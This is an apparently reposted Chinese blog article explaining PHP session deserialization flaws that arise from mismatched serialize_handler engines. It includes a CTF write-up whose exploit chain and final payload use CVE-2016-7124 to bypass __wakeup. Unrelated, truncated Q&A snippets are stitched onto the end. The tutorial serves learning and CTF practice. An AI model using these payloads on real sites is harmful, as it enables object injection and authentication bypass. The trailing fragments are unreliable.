- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章深入浅析PHP的session反序列化漏洞问题由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
在php.ini中存在三项配置项:
1
2
3
4
|
session.save_path=
""
--设置session的存储路径
session.save_handler=
""
--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动
session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认使用php
|
以上的选项就是与PHP中的Session存储和序列话存储有关的选项.
在使用xampp组件安装中,上述的配置项的设置如下:
1
2
3
4
|
session.save_path=
"D: mpp mp"
表明所有的session文件都是存储在xampp/tmp下
session.save_handler=files 表明session是以文件的方式来进行存储的
session.auto_start=0 表明默认不启动session
session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎
|
在上述的配置中,session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同.
php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 。
php:存储方式是,键名+竖线+经过serialize()函数序列处理的值 。
php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值 。
在PHP中默认使用的是PHP引擎,如果要修改为其他的引擎,只需要添加代码ini_set('session.serialize_handler', '需要设置的引擎');。示例代码如下:
session 的目录在 /var/lib/php/sessions 中 。
1
2
3
4
5
|
<?php
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
session_start();
$_SESSION
[
'name'
] =
'spoock'
;
var_dump(
$_SESSION
);
|
在 php_serialize 引擎下,session文件中存储的数据为
1
|
a:1:{s:4:
"name"
;s:6:
"spoock"
;}
|
php 引擎下文件内容为
1
|
name|s:6:
"spoock"
;
|
php_binary 引擎下文件内容为
1
|
names:6:
"spoock"
;
|
由于name的长度是4,4在ASCII表中对应的就是EOT。根据php_binary的存储规则,最后就是names:6:"spoock";。(突然发现ASCII的值为4的字符无法在网页上面显示,这个大家自行去查ASCII表吧) 。
PHP Session中的序列化危害 。
PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的.
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法。例如
1
|
$_SESSION
[
'ryat'
] =
'|O:1:"A":1:{s:1:"a";s:2:"xx";}'
;
|
php文件如
1
2
3
4
|
<?php
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
session_start();
$_SESSION
[
'ryat'
] =
'|O:1:"A":1:{s:1:"a";s:2:"xx";}'
;
|
访问后得到session文件中的内容如下:
1
2
|
root/
var
/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6
a:1:{s:4:
"ryat"
;s:30:
"|O:1:"
A
":1:{s:1:"
a
";s:2:"
xx";}
|
但此时模拟在其他页面使用不同的php引擎来读取时的内容如下:(默认使用php引擎读取session文件) 。
1
2
3
4
5
6
7
8
9
10
11
|
<?php
#
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
session_start();
#
$_SESSION
[
'ryat'
] =
'|O:1:"A":1:{s:1:"a";s:2:"xx";}'
;
class
A {
public
$a
=
'aa'
;
function
__wakeup() {
echo
$this
->a;
}
}
// var_dump($_SESSION);
|
访问该页面输出xx 。
1
2
3
4
5
6
7
|
xxarray(1) {
[
"a:1:{s:4:"
ryat
";s:30:"
"]=>
object(A)#1 (1) {
[
"a"
]=>
string(2)
"xx"
}
}
|
这是因为当使用php引擎的时候,php引擎会以|作为作为key和value的分隔符,那么就会将 a:1:{s:4:"ryat";s:30:" 作为SESSION的key,将 O:1:"A":1:{s:1:"a";s:2:"xx";} 作为value,然后进行反序列化,最后就会得到A这个类.
这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。漏洞在加载使用php引擎的页面时session去读session中的内容并反序列化导致漏洞触发,不需要任何输出 。
GCTF上的一道session反序列化漏洞分析
index.php中内容为
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<?php
//error_reporting(E_ERROR & ~E_NOTICE);
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
header(
"content-type;text/html;charset=utf-8"
);
session_start();
if
(isset(
$_GET
[
'src'
])){
$_SESSION
[
'src'
] =
$_GET
[
'src'
];
highlight_file(
__FILE__
);
print_r(
$_SESSION
[
'src'
]);
}
?>
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv=
"Content-Type"
content=
"text/html; charset=utf-8"
/>
<title>代码审计2</title>
</head>
<body>
|
在php中,经常会使用序列化操作来存取数据,但是在序列化的过程中如果处理不当会带来一些安全隐患.
1
2
3
4
5
6
7
|
<form action=
"./query.php"
method=
"POST"
>
<input type=
"text"
name=
"ticket"
/>
<input type=
"submit"
/>
</form>
<a href=
"./?src=1"
>查看源码</a>
</body>
</html>
|
query.php 中的内容为
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
/************************/
/*
//query.php 部分代码
session_start();
header('Look me: edit by vim ~0~')
//......
class TOPA{
public $token;
public $ticket;
public $username;
public $password;
function login(){
//if($this->username == $USERNAME && $this->password == $PASSWORD){ //抱歉
$this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){
return 'key is:{'.$this->token.'}';
}
}
}
class TOPB{
public $obj;
public $attr;
function __construct(){
$this->attr = null;
$this->obj = null;
}
function __toString(){
$this->obj = unserialize($this->attr);
$this->obj->token = $FLAG;
if($this->obj->token === $this->obj->ticket){
return (string)$this->obj;
}
}
}
class TOPC{
public $obj;
public $attr;
function __wakeup(){
$this->attr = null;
$this->obj = null;
}
function __destruct(){
echo $this->attr;
}
}
*/
|
思路如下
这题中我们构造一个TOPC,在析构的时候则会调用echo $this->attr;; 。
将attr赋值为TOPB对象,在echo TOPB的时候会自动调用__tostring魔术方法 。
在__tostring中会调用unserialize($this->attr),因为后面用到token和ticket,所以显然时TOPA对象。后面判断需要$this->obj->token === $this->obj->ticket,所以在序列化的时候进行指针引用使$a->ticket = &$a->token;,即可绕过判断.
至于为什么(string)$this->obj会输出flag,后台写的login可能是__tostring吧.
其中反序列化字符串中会有一个__wakeup()函数清空里面的参数,我问可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数.
最后的代码为
1
2
3
4
5
6
7
8
9
10
11
|
$testa
=
new
TOPA();
$testc
=
new
TOPC();
$testb
=
new
TOPB();
$testa
->username = 0;
$testa
->password = 0;
$testa
->ticket = &
$testa
->token;
$sa
= serialize(
$testa
);
$testc
->attr =
$testb
;
$testb
->attr =
$sa
;
$test
= serialize(
$testc
);
echo
$test
;
|
最终payload为
1
|
|O:4:
"TOPC"
:3:{s:3:
"obj"
;N;s:4:
"attr"
;O:4:
"TOPB"
:2:{s:3:
"obj"
;N;s:4:
"attr"
;s:84:
"O:4:"
TOPA
":4:{s:5:"
token
";N;s:6:"
ticket
";R:2;s:8:"
username
";i:0;s:8:"
password
";i:0;}"
;}}
|
以上所述是小编给大家介绍的PHP的session反序列化漏洞,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对我网站的支持! 。
原文链接:http://www.blogsir.com.cn/safe/371.html?utm_source=tuicool&utm_medium=referral 。
最后此篇关于深入浅析PHP的session反序列化漏洞问题的文章就讲到这里了,如果你想了解更多关于深入浅析PHP的session反序列化漏洞问题的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
我是 python 的新手。我试图找到我的文本的频率分布。这是代码, import nltk nltk.download() import os os.getcwd() text_file=open(
我对安卓 fragment 感到困惑。我知道内存 fragment 但无法理解什么是 android fragment 问题。虽然我发现很多定义,比如 Android fragmentation re
尝试对 WordPress 进行 dockerise 我发现了这个场景: 2个数据卷容器,一个用于数据库(bbdd),另一个用于wordpress文件(wordpress): sudo docker
这个问题已经有答案了: From the server is there a way to know that my page is being loaded in an Iframe (1 个回答)
我正在玩小型服务器,试图对运行在其上的服务进行docker化。为简化起见,假设我必须主要处理:Wordpress和另一项服务。 在Docker集线器上有许多用于Wordpress的图像,但是它们似乎都
我想要发生的是,当帐户成功创建后,提交的表单应该消失,并且应该出现一条消息(取决于注册的状态)。 如果成功,他们应该会看到一个简单的“谢谢。请检查您的电子邮件。” 如果不是,那么他们应该会看到一条适当
就是这样,我需要为客户添加一个唯一标识符。通过 strip 元数据。这就是我现在完全构建它的方式,但是我只有最后一部分告诉我用户购买了哪个包。 我试着看这里: Plans to stripe 代码在这
我有一个类将执行一些复杂的操作,涉及像这样的一些计算: public class ComplexAction { public void someAction(String parameter
这个问题已经有答案了: maven add a local classes directory to module's classpath (1 个回答) 已关闭10 年前。 我有一些不应更改的旧 E
我使用 fragment 已经有一段时间了,但我经常遇到一个让我烦恼的问题。 fragment 有时会相互吸引。现在,我设法为此隔离了一个用例,它是这样的: Add fragment A(也使用 ad
我的 html 中有一个 ol 列表,上面有行条纹。看起来行条纹是从数字后面开始的。有没有办法让行条纹从数字开始? 我已经包含了正在发生的事情的片段 h4:nth-child(even) {
如何仅使用 css 将附加图像 html 化? 如果用纯 css 做不到,那我怎么能至少用一个图像来做 最佳答案 这不是真正的问题,而是您希望我们为您编写代码。我建议您搜索“css breadcrum
以下是 Joshua 的 Effective Java 的摘录: If you do synchronize your class internally, you can use various te
在这里工作时,我们有一个框向业务合作伙伴提供 XML 提要。对我们的提要的请求是通过指定查询字符串参数和值来定制的。其中一些参数是必需的,但很多不是。 例如,我们要求所有请求都指定一个 GUID 来标
我有 3 个缓冲区,其中包含在 32 位处理器上运行的 R、G、B 位数据。 我需要按以下方式组合三个字节: R[0] = 0b r1r2r3r4r5r6r7r8 G[0] = 0b g1g2g3g4
我最近发现了关于如何使用 History.js、jQuery 和 ScrollTo 通过 HTML5 History API 对网站进行 Ajax 化的要点:https://github.com/br
我们有一个 Spring Boot 应用程序,由于集成需要,它变得越来越复杂——比如在你这样做之后发送一封电子邮件,或者在你之后广播一条 jms 消息等等。在寻找一些更高级别的抽象时,我遇到了 apa
我正在尝试首次实施Google Pay。我面临如何指定gateway和gatewayMarchantId的挑战。 我所拥有的是google console帐户,不知道在哪里可以找到此信息。 priva
昨天下午 3 点左右,我为两个想要从一个 Azure 帐户转移到另一个帐户的网站设置了 awverify 记录。到当天结束时,Azure 仍然不允许我添加域,所以我赌了一把,将域和 www 子域重新指
我正在使用terms facet在elasticsearch服务器中获取顶级terms。现在,我的标签"indian-government"不被视为一个标签。将其视为"indian" "governm
我是一名优秀的程序员,十分优秀!